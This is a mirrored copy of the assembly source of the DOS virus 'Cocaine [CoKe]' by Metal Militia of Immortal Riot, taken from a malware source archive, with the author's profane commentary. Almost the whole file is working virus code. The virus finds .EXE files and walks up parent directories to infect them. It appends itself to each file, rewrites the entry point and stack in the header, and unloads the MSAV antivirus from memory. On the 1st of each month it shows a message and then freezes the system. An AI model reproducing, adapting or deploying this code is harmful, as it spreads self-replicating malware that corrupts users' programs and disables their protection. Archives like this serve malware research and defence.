mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
280 lines
9.8 KiB
NASM
280 lines
9.8 KiB
NASM
|
; Virus name : Cocaine [CoKe]
|
||
|
; Virus author: Metal Militia
|
||
|
; Virus group : Immortal Riot
|
||
|
; Origin : Sweden
|
||
|
;
|
||
|
; This is an non-resident, .EXE infector moving upwards using the
|
||
|
; "dot-dot" method. Watch your .EXE files for the bad guy siganture
|
||
|
; "IR" somewhere in the beginning, after the MZ or ZM thang.. :)
|
||
|
;
|
||
|
; Also, check your back for a "?" a bit from it aswell. Btw! Everytime
|
||
|
; you run it, it'll take out that fucking MSAV piece of shit from your
|
||
|
; memory. Im telling you, go get TB-SCAN or something instead of such
|
||
|
; hacked things. TB-Scan finds this virus as both Ear-6 and Burma but
|
||
|
; is not any sort of hack from them or something. I didn't had time to
|
||
|
; fix the encryption, and since this is just a test from me i really
|
||
|
; don't give a shit, but ofcause you're always welcome to keep
|
||
|
; developing it, heheh :)
|
||
|
;
|
||
|
; To add here, is that Ear-6 is non-res com/exe infector, umm.. that's
|
||
|
; Dark Angels virus, and this is not alike it! Burma is non-res ow-vir,
|
||
|
; and also not very much alike this anyhow.. However, i've heard about
|
||
|
; some resident, non-ow Burma aswell? Not sure on thatone. So, it'll
|
||
|
; probably only confuse some users, I guess.. Enjoy Insane Reality #4!!
|
||
|
;
|
||
|
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
||
|
; COCAINE! [CoKE]
|
||
|
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
||
|
|
||
|
.model tiny
|
||
|
.radix 16
|
||
|
.code
|
||
|
org 100
|
||
|
start:
|
||
|
mov blast,0fa01 ; Take MSAV's shit
|
||
|
mov dx,5945h ; out of the fucking
|
||
|
int 16 ; memory right away
|
||
|
|
||
|
push ds ;Save old offset
|
||
|
|
||
|
push cs ;Set ES/DS/CS
|
||
|
pop es
|
||
|
push cs
|
||
|
pop ds ;for data accessing.
|
||
|
|
||
|
call get_offset ;This places the displace-
|
||
|
get_offset: ;ment of the virus from
|
||
|
pop bp ;its original compilation
|
||
|
sub bp,offset get_offset ;into BP.
|
||
|
|
||
|
Reset_Variables: ;Reset XX_old values for
|
||
|
lea di,[IP_storage+bp] ;new infection.
|
||
|
lea si,[IP_old+bp]
|
||
|
call mov_it
|
||
|
call mov_it
|
||
|
call mov_it
|
||
|
call mov_it
|
||
|
jmp set_dta
|
||
|
mov_it:
|
||
|
movsw ; movsw
|
||
|
ret ; ret(urn) to caller
|
||
|
|
||
|
Set_DTA:
|
||
|
lea dx,[New_DTA+bp] ;Set DTA to the after
|
||
|
mov ah,readin ;virus
|
||
|
int 21
|
||
|
|
||
|
mov ah,47h ; Get
|
||
|
mov dl,0 ; current
|
||
|
lea si,[bp+new_dta+2ch] ; directory
|
||
|
int 21h
|
||
|
|
||
|
Find_first_file:
|
||
|
mov ah,4e ; Find first
|
||
|
lea dx,[bp+masker] ; .EXE file
|
||
|
|
||
|
Find_File:
|
||
|
int 21
|
||
|
jnc infeqt ; If found, infect
|
||
|
jmp ch_dir ; Else, change directoy
|
||
|
|
||
|
Infeqt:
|
||
|
mov blast,3d02 ; Open file
|
||
|
lea dx,[bp+New_DTA+1e] ; 1eh = DTA place for filename
|
||
|
int 21
|
||
|
|
||
|
xchg bx,blast ; Or, mov ax,bx
|
||
|
|
||
|
mov ah,3f ; Read in
|
||
|
mov mate,readin ; 1ah
|
||
|
lea dx,[bp+exe_header] ; to EXE header
|
||
|
int 21
|
||
|
|
||
|
cmp word ptr [bp+exe_header+0e],'RI' ; Check if already
|
||
|
je close_file ; infected. If so,
|
||
|
; close and get nextone
|
||
|
call Save_Old_Header ; Save old header
|
||
|
|
||
|
mov blast,4202 ; Go to the end of the file.
|
||
|
xor mate,mate
|
||
|
cwd
|
||
|
int 21
|
||
|
|
||
|
push blast
|
||
|
push dx
|
||
|
|
||
|
call calculate_CSIP ; calculate virus startingpoint
|
||
|
|
||
|
pop dx
|
||
|
pop blast
|
||
|
|
||
|
call calculate_size ; calculate fsize for the header
|
||
|
|
||
|
mov mate,end_virus-start ; viruscode
|
||
|
mov ah,svenne ; write it
|
||
|
lea dx,[bp+start] ; from start
|
||
|
int 21 ; to victim (uninfected file)
|
||
|
|
||
|
mov blast,4200 ; Return to the beginning
|
||
|
xor mate,mate ; of the file.
|
||
|
cwd
|
||
|
int 21
|
||
|
|
||
|
mov mate,readin ; 1ah
|
||
|
mov ah,svenne ; write it
|
||
|
lea dx,[bp+exe_header] ; to the EXE header
|
||
|
int 21
|
||
|
|
||
|
Close_File:
|
||
|
mov ah,3e ; close the file
|
||
|
int 21 ; and go get the nextone
|
||
|
|
||
|
Find_Next_File:
|
||
|
mov ah,4f ; find next file
|
||
|
jmp Find_File ; do it!
|
||
|
|
||
|
No_More_Files:
|
||
|
mov ah,2a ; get date
|
||
|
int 21
|
||
|
cmp dl,1 ; 1st of any month?
|
||
|
jne ret_to_host ; if not, outa here
|
||
|
|
||
|
mov ah,9 ; print
|
||
|
lea dx,[bp+eternal_love] ; the note
|
||
|
int 21
|
||
|
jmp $
|
||
|
|
||
|
ret_to_host:
|
||
|
|
||
|
lea dx,[bp+new_dta+2ch] ; Restore
|
||
|
mov ah,3bh ; directory
|
||
|
int 21
|
||
|
|
||
|
pop ds
|
||
|
mov dx,80 ; restore
|
||
|
mov ah,readin ; the DTA
|
||
|
int 21
|
||
|
|
||
|
Restore_To_Host:
|
||
|
push ds ; Restore ES/DS/PSP
|
||
|
pop es
|
||
|
|
||
|
mov blast,es
|
||
|
add blast,10
|
||
|
|
||
|
add word ptr cs:[bp+CS_storage],blast
|
||
|
; By current seg, adjust old CS
|
||
|
|
||
|
cli ; Clear int's
|
||
|
add blast,word ptr cs:[bp+SS_storage] ; Old SS (adjust it)
|
||
|
mov ss,blast ; Original position
|
||
|
mov sp,word ptr cs:[bp+SP_storage] ; (return stack)
|
||
|
sti ; Store (?) int's
|
||
|
|
||
|
db 0ea ; Jmp Far
|
||
|
IP_storage dw 0 ; Storage place for IP/CS/SP/SS
|
||
|
CS_storage dw 0
|
||
|
SP_storage dw 0
|
||
|
SS_storage dw 0
|
||
|
|
||
|
|
||
|
IP_old dw 0
|
||
|
CS_old dw 0fff0
|
||
|
SP_old dw 0
|
||
|
SS_old dw 0fff0
|
||
|
|
||
|
K_kool:
|
||
|
jmp no_more_files
|
||
|
K_spam:
|
||
|
jmp find_first_file
|
||
|
Save_Old_Header:
|
||
|
mov blast,word ptr [exe_header+bp+0e] ; Save SS (old)
|
||
|
mov word ptr [SS_old+bp],blast
|
||
|
mov blast,word ptr [exe_header+bp+10] ; Save SP (old)
|
||
|
mov word ptr [SP_old+bp],blast
|
||
|
mov blast,word ptr [exe_header+bp+14] ; Save IP (old)
|
||
|
mov word ptr [IP_old+bp],blast
|
||
|
mov blast,word ptr [exe_header+bp+16] ; Save CS (old)
|
||
|
mov word ptr [CS_old+bp],blast
|
||
|
ret
|
||
|
|
||
|
calculate_CSIP:
|
||
|
push blast
|
||
|
mov blast,word ptr [exe_header+bp+8] ;Get header length
|
||
|
mov cl,brutal ;and convert it to
|
||
|
shl blast,cl ;bytes.
|
||
|
mov mate,blast
|
||
|
pop blast
|
||
|
|
||
|
sub blast,mate ;Subtract from
|
||
|
sbb dx,RAVE ;file (header size)
|
||
|
|
||
|
mov cl,0c ;Convert into segment
|
||
|
shl dx,cl ;address (DX)
|
||
|
mov cl,brutal
|
||
|
push blast
|
||
|
shr blast,cl
|
||
|
add dx,blast
|
||
|
shl blast,cl
|
||
|
pop mate
|
||
|
sub mate,blast
|
||
|
mov word ptr [exe_header+bp+14],mate
|
||
|
mov word ptr [exe_header+bp+16],dx ;Set CS:IP (new)
|
||
|
mov word ptr [exe_header+bp+0e],'RI' ;Set SS/CS (new)
|
||
|
mov word ptr [exe_header+bp+10],0fffe ;Set SP (new)
|
||
|
mov byte ptr [exe_header+bp+12],'?' ;mark infection
|
||
|
ret
|
||
|
|
||
|
calculate_size:
|
||
|
push blast ;Save offset for later
|
||
|
|
||
|
add blast,end_virus-start ; add size (virus)
|
||
|
adc dx,RAVE
|
||
|
|
||
|
mov cl,POLICE
|
||
|
shl dx,cl ;convert to pages (DX)
|
||
|
mov cl,BRUTALITY
|
||
|
shr blast,cl
|
||
|
add blast,dx
|
||
|
inc blast
|
||
|
mov word ptr [exe_header+bp+SPAM],blast ; save pages (x number)
|
||
|
|
||
|
pop blast ; get offset
|
||
|
mov dx,blast
|
||
|
shr blast,cl ; calcute last page
|
||
|
shl blast,cl ; (remainder)
|
||
|
sub dx,blast
|
||
|
mov word ptr [exe_header+bp+RUDE],dx ;save remainder
|
||
|
ret
|
||
|
|
||
|
ch_dir:
|
||
|
mov ah,3bh ; Change
|
||
|
lea dx,[bp+dot_dot] ; up a dir
|
||
|
int 21
|
||
|
jc no_more ; If root, outa here
|
||
|
jmp k_spam ; Else, try to infect here aswell
|
||
|
|
||
|
no_more:
|
||
|
jmp k_kool
|
||
|
|
||
|
blast equ ax
|
||
|
mate equ cx
|
||
|
police equ 7
|
||
|
brutality equ 9
|
||
|
rave equ 0 ; Hey! That's you :)
|
||
|
spam equ 04
|
||
|
rude equ 02
|
||
|
brutal equ 4
|
||
|
readin equ 1a
|
||
|
svenne equ 40
|
||
|
virnote db 'Cocaine [CoKe]'
|
||
|
db '(c) Metal Militia/Immortal Riot'
|
||
|
eternal_love db 0dh,0ah,'Love to LISA :)',0dh,0ah,'$'
|
||
|
db 'Cocaine''s running thrue your vains'
|
||
|
db 'It seems you have become an addict'
|
||
|
masker db '*IR.EXE',0 ;File mask used for search
|
||
|
dot_dot db '..',0
|
||
|
end_virus:
|
||
|
exe_header db 1a dup (?)
|
||
|
New_DTA:
|
||
|
end start
|